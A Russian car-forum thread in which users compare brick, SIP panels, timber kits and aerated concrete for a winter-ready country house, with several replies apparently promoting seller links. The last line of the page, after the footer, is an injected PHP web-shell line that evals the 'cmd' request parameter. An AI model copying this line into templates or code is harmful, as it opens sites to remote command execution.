+ Ответить в теме
Показано с 1 по 9 из 9

Тема: Из какого материала сегодня надежней всего строить загородным дом?


  1. #1
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136

    Из какого материала сегодня надежней всего строить загородным дом?

    Из какого материала сегодня надежней всего строить загородным дом? Хочу в МО построить дом, но никак не выберу материал из которого дом будет надежней всего. Тем более время в нем проводить я хочу не только летом, но и зимой, а значит что он должен быть теплым и при минус 20 за окном.

  2. #2
    Не знаю из какого надежней всего, но считаю, что стоит идти в ногу со временем. Вот сейчас вроде как самые современные технологии строительства из СИП панелей. Хотя в мире это не новая технология, но мне нравиться, чт можно в кратчайшие сроки возвести вполне себе надежный и теплый дом, даже для нашей зимы.

  3. #3
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Кирпич - самый надежный вариант, но из-за длительного срока строительства и дороговизны, он не пользуется популярностью. Однако дома из кирпича простоят лет 50-60 точно, при уходе за ним естественно)

  4. #4
    Я на вашем месте заказал бы дом комплект из профильного бруса напрямую от какого-то производителя, например - http://prof-brus.com/gotovye-domokomplekty/ . Мне кажется, что загородный дом должен быть из дерева) Но может это только мое впечатление и вкусы, но тем не менее, почему бы и нет? Тем более, брус - отличный, надежный материал для дом. Несколько десяток лет простоит точно)

  5. #5
    Мимо проходил MihaV is on a distinguished road Аватар для MihaV
    Регистрация
    29.11.2017
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    54
    вообще, сейчас очень популярно строиться из ячеистого бетона.

    ---------- Сообщение добавлено в 17:40 ---------- Предыдущее сообщение размещено в 17:40 ----------

    ну, к примеру, из газобетонных или пенобетонных материалов!

  6. #6
    Мимо проходил Дарий is on a distinguished road Аватар для Дарий
    Регистрация
    03.04.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    50
    Конечно же лучше кирпич , хотя сейчас есть и много разных заменителей , из которых выгоняют коробки. Ты потом можешь утеплить дом , всё упирается в финансы. Пено и газоблоки тоже в тренде , люди строятся также само из этого материала. Насчет того что ячеистый бетон популярен в применении https://1beton.info/vidy/yacheistyj-beton , это точно. Смотрите даже сами, тут столько информации об этом, наверняка есть что либо интересное.

  7. #7
    Мимо проходил fionis is on a distinguished road Аватар для fionis
    Регистрация
    30.11.2018
    Машина
    Гольф
    Сообщений
    49
    Кирпичный дом дорого обходится, один фундамент будет чего стоить. Да и по срокам это займет много времени. Я весной хочу заняться строительством дома, но хотелось бы за один сезон управиться, чтобы уже летом можно было заниматься внутренней отделкой и заселяться

  8. #8
    Мимо проходил Rostikk is on a distinguished road Аватар для Rostikk
    Регистрация
    05.12.2018
    Сообщений
    55
    А чем вам брус плох, как выше советовали? В интернете есть немало предложений по продаже домокомплектов для дачи по Москве, вот, к примеру одно из них https://msk.wood-work.pro/catalog/doma?material%5B%5D=2. Вы сами сможете его собрать, своими силами, за пару месяцев управитесь, думаю. Если будете брать клееный брус, то ему не требуется даже усадка, можно будет сразу приступать к внутренней отделке

  9. #9
    Мимо проходил Dabamer is on a distinguished road Аватар для Dabamer
    Регистрация
    30.03.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    20
    Это норм варианты

+ Ответить в теме

Похожие темы

  1. Какого цвета должен быть GTI?
    от KOT в разделе Golf 5
    Ответов: 54
    Последнее сообщение: 03.01.2024, 03:43
  2. Ответов: 8
    Последнее сообщение: 02.10.2023, 19:54
  3. Ответов: 9
    Последнее сообщение: 02.10.2023, 19:47
  4. Ответов: 6
    Последнее сообщение: 08.03.2021, 18:26
  5. Какого диаметра фронт в Г4?
    от vitalik2k в разделе Авто Звук
    Ответов: 9
    Последнее сообщение: 28.05.2007, 20:22

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}